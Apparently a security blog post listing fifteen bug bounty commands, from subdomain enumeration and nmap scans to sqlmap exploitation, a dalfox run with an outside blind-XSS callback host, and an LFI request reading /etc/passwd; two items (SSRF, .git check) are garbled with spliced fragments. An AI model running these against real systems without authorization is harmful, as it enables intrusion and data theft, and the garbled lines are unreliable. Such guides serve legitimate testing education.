Listen to this Post
Introduction:
Bug bounty hunting has evolved from a niche hobby into a professional cybersecurity discipline, offering a legitimate path to identify and report critical vulnerabilities. Mastering the right tools and commands is the difference between a rejected report and a rewarded discovery. This guide provides the essential command-line arsenal for modern hunters.
Learning Objectives:
- Master fundamental reconnaissance and subdomain enumeration techniques.
- Execute common web application vulnerability scans and analyses.
- Utilize advanced exploitation and post-exploitation commands for proof-of-concept development.
You Should Know:
1. Subdomain Enumeration with `amass` and `subfinder`
`amass enum -passive -d target.com`
`subfinder -d target.com -silent`
Subdomain discovery is the critical first step in mapping a target’s attack surface. These commands perform passive reconnaissance to identify subdomains without directly interacting with the target’s servers. `amass` gathers information from numerous passive sources, while `subfinder` uses a variety of public APIs. Combine their outputs, sort uniquely, and you have a comprehensive list of domains to investigate.
- Probing for Live Hosts and HTTP Services with `httpx`
`cat domains.txt | httpx -silent -title -status-code -tech-detect`
Once you have a list of subdomains, you need to identify which are live and what technologies they are running. This `httpx` command takes a list of domains, probes them, and returns the HTTP status code, page title, and detected technologies (e.g., WordPress, React, Nginx). This quickly filters out dead endpoints and prioritizes targets based on the tech stack.
3. Port Scanning for Service Discovery with `nmap`
`nmap -sV -sC -O -p- target.com`
A foundational command for any penetration tester, this `nmap` scan is aggressive and comprehensive. `-sV` probes open ports to determine service/version info, `-sC` runs default scripts, `-O` attempts OS detection, and `-p-` scans all 65535 ports. This reveals hidden services running on non-standard ports that could be vulnerable.
4. Directory and Path Brute-forcing with `ffuf`
`ffuf -w /path/to/wordlist -u https://target.com/FUZZ -mc 200,301,302,403`
`ffuf` is a fast web fuzzer. This command brute-forces directories and files on a web server. The `-w` flag specifies the wordlist, `-u` is the URL with `FUZZ` acting as the placeholder, and `-mc` filters for successful HTTP response codes. Discovering hidden directories like /admin, /backup, or `/api` can lead to sensitive information exposure.
5. Discovering Sensitive Files with `gobuster`
`gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt -x php,txt,bak`
Similar to ffuf, `gobuster` is used for directory brute-forcing. This command specifically looks for common filenames with the extensions .php, .txt, and .bak. Finding files like robots.txt, config.php.bak, or `readme.txt` can reveal API keys, database credentials, or other critical information for the target’s infrastructure.
6. Analyzing JavaScript for API Endpoints and Secrets
`cat script.js | grep -E “(api|api-key|token|auth|jwt|secret|key)”`
`subjs https://target.com | grep -v “.min.js”`
Single Page Applications (SPAs) often contain a treasure trove of endpoints and hardcoded secrets within their JavaScript files. The first command searches a local JS file for common keywords. The second uses `subjs` to find JS files on a target domain, filtering out minified files to prioritize human-readable code for manual analysis.
7. Parameter Discovery for Testing with `arjun`
`arjun -u https://target.com/endpoint –get`
Many vulnerabilities exist in parameters (e.g., ?id=1). `arjun` is a powerful tool that discovers hidden HTTP parameters. This command tests the given URL for a vast array of parameter names using GET requests. Discovering parameters like `?debug=true` or `?admin=false` can open doors to functionality not intended for public access.
8. Automated Vulnerability Scanning with `nuclei`
`nuclei -u https://target.com -t /path/to/nuclei-templates/ -severity medium,high,critical`
`nuclei` uses a community-powered database of templates to scan for thousands of known vulnerabilities. This command scans a target and runs all templates classified as medium, high, or critical severity. It’s an efficient way to quickly identify low-hanging fruit like exposed panels, default credentials, and known CVEs.
9. SQL Injection Testing with `sqlmap`
`sqlmap -u “https://target.com/page?id=1” –batch –level=3 –risk=3`
For a potential SQL injection point, `sqlmap` automates the process of exploiting it. This command runs `sqlmap` on the given URL with the `id` parameter, using moderate risk and level settings. The `–batch` flag runs it non-interactively, accepting default prompts. Always use this only on targets you are authorized to test.
10. Cross-Site Scripting (XSS) Testing with `dalfox`
`dalfox url “https://target.com/search?q=test” -b https://hacker.xss.ht`
`dalfox` is a powerful XSS scanning tool. This command tests the `q` parameter for reflected XSS vulnerabilities. The `-b` flag specifies a blind XSS callback server (like https://xss.ht), which can catch stored XSS payloads that execute later. This is crucial for proving the impact of a found vulnerability.
11. Server-Side Request Forgery (SSRF) Testing
curl -i "http://internal-target.com/admin" -H "Host: localhost" -x http://127.0.0.1:8080`-x http://127.0.0.1:8080`) and manipulating the `Host` header.
Testing for SSRF often involves tricking the server into making requests to internal or controlled systems. This `curl` command attempts to access an internal admin panel by proxying the request through a local tool like Burp Suite (
12. Checking for File Inclusion Vulnerabilities (LFI/RFI)
`curl -s “http://target.com/page?file=../../../../etc/passwd” | head -n 5`
A simple test for Local File Inclusion (LFI). This command attempts to read the `/etc/passwd` file on a Unix-like system by traversing directories using `../` sequences. If successful, it will output the first five lines of the file, confirming the vulnerability and potential for sensitive file disclosure.
13. Analyzing SSL/TLS Configuration with `testssl.sh`
`testssl.sh –color 0 target.com:443`
A strong SSL/TLS configuration is vital for security. This command runs the `testssl.sh` tool to check for misconfigurations, weak ciphers, and vulnerabilities like Heartbleed. It provides a detailed report on the target’s crypto setup, which can sometimes be the entry point for a chain of attacks.
14. Git Repository Exposure Check
curl -s http://target.com/.git/HEAD`ref: refs/heads/master`) indicates the repository is accessible, potentially allowing an attacker to download the entire source code.
A common misconfiguration is the accidental exposure of the `.git` directory on a live web server. This command checks for its presence. A 200 OK response with a git reference (e.g.,
15. Automating Recon with a Bash One-Liner
`subfinder -d target.com -silent | httpx -silent | nuclei -t /path/to/nuclei-templates/ -severity low,medium,high,critical -silent`
This powerful one-liner automates the initial recon and scan process. It discovers subdomains, filters for live ones, and immediately runs a comprehensive `nuclei` scan on them. This pipeline allows for rapid assessment of a target’s external footprint.
What Undercode Say:
- Automation is Non-Negotiable: The scale of modern applications demands automated tooling. Manual testing alone is insufficient; hunters must master chaining tools together to efficiently narrow down thousands of endpoints to a handful of critical vulnerabilities.
- Context is King: A tool can find a potential flaw, but a hunter proves its impact. Understanding the business logic of the target and crafting a proof-of-concept that demonstrates real risk (e.g., data breach, user compromise) is what leads to high-value bounties.
The landscape of bug bounty hunting is shifting from pure technical exploitation towards a more holistic approach that includes business logic flaws and API security. The most successful hunters are those who can not only run the tools but also think like an attacker and an architect, understanding how systems interconnect and where the true value lies for a malicious actor. This requires continuous learning and adapting one’s toolkit.
Prediction:
The automation and democratization of hacking tools will force a paradigm shift in application security. Defenders will increasingly rely on AI-powered security scanners that can anticipate attack methodologies, leading to an arms race between AI-driven offensive and defensive tools. Bug bounty programs will become standard practice for all serious software companies, and the value of critical vulnerabilities will skyrocket as the baseline of security is raised, making only the most sophisticated flaws financially rewarding.
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Gorka El – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
